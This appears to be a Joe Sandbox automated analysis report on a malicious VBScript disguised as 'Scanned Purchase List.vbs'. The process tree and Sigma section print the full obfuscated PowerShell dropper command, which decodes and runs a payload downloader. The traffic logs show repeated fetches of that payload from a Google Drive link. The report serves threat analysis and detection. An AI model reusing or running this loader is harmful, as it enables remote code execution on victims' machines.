Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scanned Purchase List.vbs

Overview

General Information

Sample name:Scanned Purchase List.vbs
Analysis ID:1523158
MD5:15b5b581555ff3e269c973f152f71cf6
SHA1:b192825801c73167464fe4fdc71925b296379d24
SHA256:24bddce898f1e7b3feb484483fe5bad7a29b95cdabef060ca7872d3ec3c2597f
Tags:vbsuser-abuse_ch
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7348 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohInceKorsCicoaftnser,sep$C,aB EmiPunl Asl s aU raNonn ineBaltA asD.t) su ';$Billaanets=$counterargues;tramelling (doublecrossing ' or$BilGBomLEneoB tbslaaBorlThr:r taPolP InoBo.CKa rIndiFugs riiTemA RaRElsY.al=Bar(T lTsquemars stT.ar-H.aP DraRabTRekHUns Ve $FisbOphIfreLM.nL saa LoAProNslaEsuktValsUni) h ');while (!$Apocrisiary) {tramelling (doublecrossing 'But$kurgAn,lLabo eb omaUnplHay:Rare tuuRovpQuah,oro P r BebKopiUndaMsslMaa=End$PretskorT auAc e ca ') ;tramelling $semicolloquially;tramelling (doublecrossing 'Ejesne tAn a inrHeatCol-BrassamlUnde epeNatpDag Ove4Des ');tramelling (doublecrossing 'Hil$ Img flsk oConbmisaDenlFra:MasA edpEnaoEkscPr,rBesiYo.sCrei Coa Vgr LuyA t=sun(K lTIngeAngsF,etGen- F.PProajawt M,hUrt Uni$sa Bskai VelDefls aaD pa O n oeMu.tG as wh)ste ') ;tramelling (doublecrossing ' W.$ m g KolUddoArab onaAu l re: spEs unNa.est rsikg.isieftmI fnDdsg HjdstueN n=Ord$ TygCollNaroTrubLeuaGullLyd:FalTP,oiTypdA bsA phFo.o scr U,i ResBisoGran.omt Wase b+ Di+fo %Dre$EnhsOmvtAs,yOpdr astEpidDy,yFl.kLyckFale efrUnd..emcManospruFusnDyrtsk, ') ;$Encheson=$styrtdykker[$Energimngde];}$Arthriticine=282118;$sorteringsordenen=30262;tramelling (doublecrossing 'Pl.$WabgCenlslaoLeubFraa jal t : g.Osi.mBets ortGloy U.rProtPseeHyptEpi slv=Bai st G Alesutt.xa-sacC PtoPosnP ntHa.eLu.n cetC.e Br$ .tBen,i amlPral leaBliasarnOldeMontEkss Di ');tramelling (doublecrossing 'sty$salg Auls po ekb abaph lOpe:,arsso.t pioBard CodGene ajrFlikVano PrnspigE ee phnU d Ext=E e mi.[Mi sTepyFlysOlitTaveKipm.ol. emCspyosannFunv HaeAmpr CotOm ]B,g:Beg:VouFD,nr.etoUnwmscrBsc aKapsLuneUpp6Pis4 Hos TwtIntrCh iAfgnraagTer(Kam$EmpOB.omAmbssket piyJu r,ret R eApptAld) sl ');tramelling (doublecrossing 'Fi $,mmgjo l skoPosb O.asunl i:by,NKo,o C tD ma.xmrsc iBoazKomisarnRefgB.a Ma=Euc Unc[ HasD nyTemsBettBiseFlamM k.RomTI seDisxambtBlo.WigEOs nDigcBabo Pad PliAfsnTimgTik],kr:De : slAFars ReCUnuIsamI.ta. H,G .reEsttConsCymtU ora,visa nHoggInf(ye $Fr s ngt A,oBledAardRe e MorInskVagoF,dnMicgAlleCatnall) Re ');tramelling (doublecrossing 'Mya$ eg ypl,kooU sb.oua.hol gn:TreC,ighsweuLancCsuk ,oyse.=Lio$Mi NPasoO.ltBloa C ra si DizAfkiNo n.argskr.AmpsNymu U,b sksGr tTv,rDiviseenmaagFor(T.e$,arA FurstytIndhBelrTiliNontGenis.lc nistyn,tiePha,bin$ ous,eaoKonr T,tMeleKokrHo iLinnEntgTilsshaoBarr MadKroe Ben AceNo n T ) ka ');tramelling $Chucky;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7444JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_7444.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", ProcessId: 7348, ProcessName: wscript.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", ProcessId: 7348, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohInceKorsCicoaftnser,sep$C,aB EmiPunl Asl s aU raNonn ineBaltA as

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-01T07:45:54.091474+020028033053Unknown Traffic192.168.2.449737142.250.185.142443TCP
      2024-10-01T07:46:14.480901+020028033053Unknown Traffic192.168.2.449746142.250.185.142443TCP
      2024-10-01T07:46:19.571212+020028033053Unknown Traffic192.168.2.449747142.250.185.142443TCP
      2024-10-01T07:46:24.654203+020028033053Unknown Traffic192.168.2.449748142.250.185.142443TCP
      2024-10-01T07:46:40.297941+020028033053Unknown Traffic192.168.2.449754142.250.185.142443TCP
      2024-10-01T07:47:00.922546+020028033053Unknown Traffic192.168.2.449759142.250.185.142443TCP
      2024-10-01T07:47:05.956043+020028033053Unknown Traffic192.168.2.449760142.250.185.142443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: Scanned Purchase List.vbsVirustotal: Detection: 12%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 81.4% probability
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49763 version: TLS 1.2
      Source: Binary string: .pdb_ source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32W source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Core.pdb, source: powershell.exe, 00000001.00000002.3012431445.000001ADE7DC9000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 142.250.185.142:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 142.250.185.142:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 142.250.185.142:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 142.250.185.142:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 142.250.185.142:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 142.250.185.142:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 142.250.185.142:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 01 Oct 2024 05:45:42 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-q8oJJG7lrmgUDLiilGDf0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, 